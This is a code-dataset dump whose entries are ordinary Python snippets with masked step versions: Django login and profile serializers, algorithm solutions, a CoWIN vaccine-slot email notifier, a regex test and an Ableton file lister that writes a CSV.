''):\n device_os = 'iOS'\n device, created = DeviceUser.objects.get_or_create(user=user,\n device_user_token=device_user_token)\n device.device_os = device_os\n device.is_active = True\n device.save()\n return user\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import serializers\n\nfrom tandlr.core.api.serializers import ModelSerializer\nfrom tandlr.users.models import DeviceUser, User, UserSettings\nfrom tandlr.utils.refresh_token import create_token\n\n\nclass LoginSerializer(serializers.Serializer):\n email = serializers.EmailField(\n required=True\n )\n\n password = serializers.CharField(\n required=True\n )\n\n device_user_token = serializers.CharField(\n max_length=250,\n allow_blank=True,\n required=False\n )\n\n device_os = serializers.CharField(\n max_length=30,\n allow_blank=False\n )\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError(\"invalid credentials\")\n\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError(\"invalid credentials\")\n\n return data\n\n def create(self, validated_data):\n # Valitation mail\n user = get_object_or_404(User, email=validated_data.get('email'))\n\n device_user_token = validated_data.get('device_user_token')\n device_os = validated_data.get('device_os')\n\n if (isinstance(device_user_token, unicode) and\n len(device_user_token) == 64 and\n (not device_os or device_os == '')):\n device_os = 'iOS'\n\n # Save data of the device\n device, created = DeviceUser.objects.get_or_create(\n user=user,\n device_user_token=device_user_token\n )\n\n device.device_os = device_os\n device.is_active = True\n device.save()\n\n return user\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n\n try:\n self.instance = DeviceUser.objects.get(**data)\n\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserSettings\n fields = (\n 'id',\n 'session_confirm',\n 'message',\n 'session_cancellation',\n 'location_change',\n 'session_reminder',\n 'available',\n 'push_notifications_enabled'\n )\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'name', 'last_name',\n 'second_last_name', 'description', 'photo', 'email',\n 'phone', 'zip_code', 'birthday', 'gender', 'is_student',\n 'is_teacher', 'token', 'settings'\n )\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n\n token = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = ('token', )\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-ids": [
9,
11,
15,
17,
19
]
}
|
[
9,
11,
15,
17,
19
] |
"""Given an integer array arr and an integer difference, return the length of
the longest subsequence in arr which is an arithmetic sequence such that the
difference between adjacent elements in the subsequence equals difference."""
class Solution(object):
def longestSubsequence(self, arr, difference):
dp = dict()
mx = 0
for num in arr:
if num - difference in dp:
dp[num] = 1 + dp[num-difference]
else:
dp[num] = 1
mx = max(dp[num],mx)
return mx
|
normal
|
{
"blob_id": "fa4ab3ed5c653633879b5ba2c078c896aa3eb0c6",
"index": 2838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def longestSubsequence(self, arr, difference):\n dp = dict()\n mx = 0\n for num in arr:\n if num - difference in dp:\n dp[num] = 1 + dp[num - difference]\n else:\n dp[num] = 1\n mx = max(dp[num], mx)\n return mx\n",
"step-4": "\"\"\"Given an integer array arr and an integer difference, return the length of \nthe longest subsequence in arr which is an arithmetic sequence such that the \ndifference between adjacent elements in the subsequence equals difference.\"\"\"\n\n\nclass Solution(object):\n def longestSubsequence(self, arr, difference):\n dp = dict()\n mx = 0\n for num in arr:\n if num - difference in dp:\n dp[num] = 1 + dp[num-difference]\n else:\n dp[num] = 1\n mx = max(dp[num],mx)\n return mx\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#alds13c
from collections import deque
d_stack=deque()
res_stack=deque()
s = input()
for i in range(len(s)):
#print(d_stack,res_stack)
if s[i]=="\\":
d_stack.append(i)
elif s[i]=="/":
if len(d_stack)==0:
continue
left = d_stack.pop()
area = i-left
#res_stack.append((left,area))
if len(res_stack)>0:
flag=True
#merge_candidate = []
mergeareasum=0
while flag:
if len(res_stack)>0 and left<res_stack[-1][0]:
mc = res_stack.pop()
mergeareasum += mc[1]
#res_stack.append((left,under[1]+area))
else:
flag = False
res_stack.append((left,area+mergeareasum))
else:
res_stack.append((left,area))
ans=0
v_devided=[]
for pair in res_stack:
ans += pair[1]
v_devided.append(str(pair[1]))
print(ans)
if len(v_devided)>0:
print(len(v_devided)," ".join(v_devided))
else:
print(0)
|
normal
|
{
"blob_id": "48e3259698788904e000eb15b5443067b0c3e791",
"index": 5968,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\n<mask token>\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-3": "<mask token>\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-4": "from collections import deque\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-5": "#alds13c\nfrom collections import deque\n\nd_stack=deque()\nres_stack=deque()\ns = input()\n\nfor i in range(len(s)):\n #print(d_stack,res_stack)\n if s[i]==\"\\\\\":\n d_stack.append(i)\n elif s[i]==\"/\":\n if len(d_stack)==0:\n continue\n left = d_stack.pop()\n area = i-left\n #res_stack.append((left,area))\n if len(res_stack)>0:\n flag=True\n #merge_candidate = []\n mergeareasum=0\n while flag:\n if len(res_stack)>0 and left<res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n #res_stack.append((left,under[1]+area))\n else:\n flag = False\n res_stack.append((left,area+mergeareasum))\n else:\n res_stack.append((left,area))\n\nans=0\nv_devided=[]\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided)>0:\n print(len(v_devided),\" \".join(v_devided))\nelse:\n print(0)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import smtplib
import requests
import datetime
import json
import time
from datetime import date
from urllib.request import Request,urlopen
today = date.today().strftime("%d-%m-%y")
count = 0
pincodes = ["784164","781017","784161","787001"]
date = 0
temp = str(14) + "-05-21"
while True:
for i in range(0,8):
temp = str(23+i) + "-05-21"
for pincode in pincodes:
req = Request(
"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode=" + pincode + "&date=" + temp,
headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
data = json.loads(webpage)
for center in data["centers"]:
for session in center["sessions"]:
print("\t", center["name"])
print("\t", center["address"])
print("\t Price: ", center["fee_type"])
print("\t", session["vaccine"])
print("\t Age limit:", session["min_age_limit"])
print("\t Available Capacity: ", session["available_capacity"])
print("////////////////////////////////////////////////////")
if int(session["available_capacity"]) > 0:
server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
server.login("[email protected]", "password")
if pincode == "784164":
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
elif pincode == "781017":
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
else:
server.sendmail("[email protected]", "[email protected]",
"Vaccine available , Kindly check your cowin app")
server.quit()
time.sleep(20)
|
normal
|
{
"blob_id": "7c60ae58b26ae63ba7c78a28b72192373cc05a86",
"index": 1211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-3": "<mask token>\ntoday = date.today().strftime('%d-%m-%y')\ncount = 0\npincodes = ['784164', '781017', '784161', '787001']\ndate = 0\ntemp = str(14) + '-05-21'\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-4": "import smtplib\nimport requests\nimport datetime\nimport json\nimport time\nfrom datetime import date\nfrom urllib.request import Request, urlopen\ntoday = date.today().strftime('%d-%m-%y')\ncount = 0\npincodes = ['784164', '781017', '784161', '787001']\ndate = 0\ntemp = str(14) + '-05-21'\nwhile True:\n for i in range(0, 8):\n temp = str(23 + i) + '-05-21'\n for pincode in pincodes:\n req = Request(\n 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode='\n + pincode + '&date=' + temp, headers={'User-Agent':\n 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n data = json.loads(webpage)\n for center in data['centers']:\n for session in center['sessions']:\n print('\\t', center['name'])\n print('\\t', center['address'])\n print('\\t Price: ', center['fee_type'])\n print('\\t', session['vaccine'])\n print('\\t Age limit:', session['min_age_limit'])\n print('\\t Available Capacity: ', session[\n 'available_capacity'])\n print(\n '////////////////////////////////////////////////////')\n if int(session['available_capacity']) > 0:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login('[email protected]',\n 'password')\n if pincode == '784164':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n elif pincode == '781017':\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n else:\n server.sendmail('[email protected]',\n '[email protected]',\n 'Vaccine available , Kindly check your cowin app'\n )\n server.quit()\n time.sleep(20)\n",
"step-5": "import smtplib\r\nimport requests\r\nimport datetime\r\nimport json\r\nimport time\r\nfrom datetime import date\r\nfrom urllib.request import Request,urlopen\r\n\r\ntoday = date.today().strftime(\"%d-%m-%y\")\r\ncount = 0\r\n\r\npincodes = [\"784164\",\"781017\",\"784161\",\"787001\"]\r\n\r\ndate = 0\r\ntemp = str(14) + \"-05-21\"\r\n\r\n\r\nwhile True:\r\n\r\n for i in range(0,8):\r\n temp = str(23+i) + \"-05-21\"\r\n for pincode in pincodes:\r\n req = Request(\r\n \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode=\" + pincode + \"&date=\" + temp,\r\n headers={'User-Agent': 'Mozilla/5.0'})\r\n webpage = urlopen(req).read()\r\n data = json.loads(webpage)\r\n for center in data[\"centers\"]:\r\n for session in center[\"sessions\"]:\r\n print(\"\\t\", center[\"name\"])\r\n print(\"\\t\", center[\"address\"])\r\n print(\"\\t Price: \", center[\"fee_type\"])\r\n print(\"\\t\", session[\"vaccine\"])\r\n print(\"\\t Age limit:\", session[\"min_age_limit\"])\r\n print(\"\\t Available Capacity: \", session[\"available_capacity\"])\r\n print(\"////////////////////////////////////////////////////\")\r\n if int(session[\"available_capacity\"]) > 0:\r\n server = smtplib.SMTP_SSL(\"smtp.gmail.com\", 465)\r\n server.login(\"[email protected]\", \"password\")\r\n if pincode == \"784164\":\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n elif pincode == \"781017\":\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n else:\r\n server.sendmail(\"[email protected]\", \"[email protected]\",\r\n \"Vaccine available , Kindly check your cowin app\")\r\n server.quit()\r\n time.sleep(20)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
def year_choices():
return [(r, r) for r in range(1984, datetime.date.today().year + 1)]
def current_year():
return datetime.date.today().year
|
normal
|
{
"blob_id": "90bb70b0a97c7872c8581a176ebacc50df8e1f72",
"index": 464,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\ndef current_year():\n return datetime.date.today().year\n",
"step-4": "import datetime\n\n\ndef year_choices():\n return [(r, r) for r in range(1984, datetime.date.today().year + 1)]\n\n\ndef current_year():\n return datetime.date.today().year\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import warnings
from re import *
from pattern import collection
warnings.filterwarnings("ignore")
def test():
raw_text = "通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»"
pattern = collection.pattern_test("js_var")
print(f"匹配模式为:{pattern}")
print("----------------------------------------------")
#return_text = findall(pattern, raw_text)
pattern = compile(pattern)
return_text = sub(pattern, "替换成功", raw_text)
print(return_text)
''' if(return_text):
for i, each in enumerate(return_text):
print(f"第{i+1}个匹配结果:{each}")
else:
print("Not Found pattern-like string!") '''
if __name__ == "__main__":
test()
|
normal
|
{
"blob_id": "488d20a86c5bddbca2db09b26fb8df4b6f87a1dc",
"index": 2354,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\n<mask token>\n",
"step-3": "<mask token>\nwarnings.filterwarnings('ignore')\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\nif __name__ == '__main__':\n test()\n",
"step-4": "import warnings\nfrom re import *\nfrom pattern import collection\nwarnings.filterwarnings('ignore')\n\n\ndef test():\n raw_text = (\n \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n )\n pattern = collection.pattern_test('js_var')\n print(f'匹配模式为:{pattern}')\n print('----------------------------------------------')\n pattern = compile(pattern)\n return_text = sub(pattern, '替换成功', raw_text)\n print(return_text)\n \"\"\" if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") \"\"\"\n\n\nif __name__ == '__main__':\n test()\n",
"step-5": "import warnings\nfrom re import *\n\nfrom pattern import collection\n\nwarnings.filterwarnings(\"ignore\")\n\ndef test():\n raw_text = \"通化辉南县经济适用房_通化辉南县经适房_通化辉南县经济适用房转让_通化去114网通化切换城市var googlequerykey ='二手经适房 二手房买卖 二手房地产公司' ; var AdKeyWords = 'jingshifang';var cityname ='通化' ; var ChildURL = 'ershoufang';不限出售求购不限东昌区二道江区梅河口市集安市通化县辉南县柳河县其他不限一室两室三室四室四室以上不限毛坯简单中档精装豪华不限个人经纪人免费发布二手房信息»\"\n pattern = collection.pattern_test(\"js_var\")\n print(f\"匹配模式为:{pattern}\")\n print(\"----------------------------------------------\")\n #return_text = findall(pattern, raw_text)\n pattern = compile(pattern)\n return_text = sub(pattern, \"替换成功\", raw_text)\n print(return_text)\n\n ''' if(return_text):\n for i, each in enumerate(return_text):\n print(f\"第{i+1}个匹配结果:{each}\")\n else:\n print(\"Not Found pattern-like string!\") '''\n\nif __name__ == \"__main__\":\n test()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import os, sys, datetime, csv, platform
####FUNCTIONS####
#Get Creation Time
def get_lastupdate_date(path):
return os.path.getmtime(path)
#Get Date From String
def convertIntToTimestamp(timeint):
return str(datetime.datetime.fromtimestamp(timeint))
#Get Filename
def getFilename(name):
return os.path.basename(name)
# Get File Creation Time
def creation_date(path):
"""
Try to get the date that a file was created, falling back to when it was
last modified if that isn't possible.
See http://stackoverflow.com/a/39501288/1709587 for explanation.
"""
if platform.system() == 'Windows':
return os.path.getctime(path)
else:
stat = os.stat(path)
try:
return stat.st_birthtime
except AttributeError:
# We're probably on Linux. No easy way to get creation dates here,
# so we'll settle for when its content was last modified.
return stat.st_mtime
#Print List
def print_list(x):
for i in range(0,len(x)):
print(x[i])
return x
#Listing Files
def fileList(source, filetype='.als'):
matches = []
for root, dirnames, filenames in os.walk(source):
for filename in filenames:
if filename.endswith((filetype)):
matches.append(os.path.join(root, filename))
return matches
def mylistdir(directory):
"""A specialized version of os.listdir() that ignores files that
start with a leading period."""
filelist = os.listdir(directory)
return [x for x in filelist
if not (x.startswith('.'))]
def collectElements(dir):
## collecting elements into a list
for directory in dir:
for filename in directory:
if filename.endswith(".als"):
thefiles.append(filename)
return thefiles
## INPUTDIRECTORIES
subpath = []
subdirs = []
thefiles = []
thelist = []
## Examples of Directories
#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects
#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project
filePath = r"/Users/blakenicholson/Dropbox/Ableton Projects"
#filePath = raw_input('File path would you like to use: ')
dirs = mylistdir(filePath)
print(dirs)
print(collectElements(dirs))
#Writes contents of filePath to a txt file
file = open("testtext.txt","w+")
for item in fileList(filePath):
file.write(os.path.basename(item) +", "+convertIntToTimestamp(get_lastupdate_date(item))+", "+convertIntToTimestamp(creation_date(item))+", "+os.path.abspath(item)+"\n")
file.close
#convert txt -> csv
with open('testcsv.csv', 'w+') as fp:
a = csv.writer(fp, delimiter=',')
a.writerow(['File Name','Updated Date','Created Date','Path'])
for item in fileList(filePath):
a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])
|
normal
|
{
"blob_id": "e83b6b1f4cb12fe3b932903eddddfb0dc0e7d98d",
"index": 2765,
"step-1": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\n<mask token>\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\nprint(dirs)\nprint(collectElements(dirs))\n<mask token>\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + 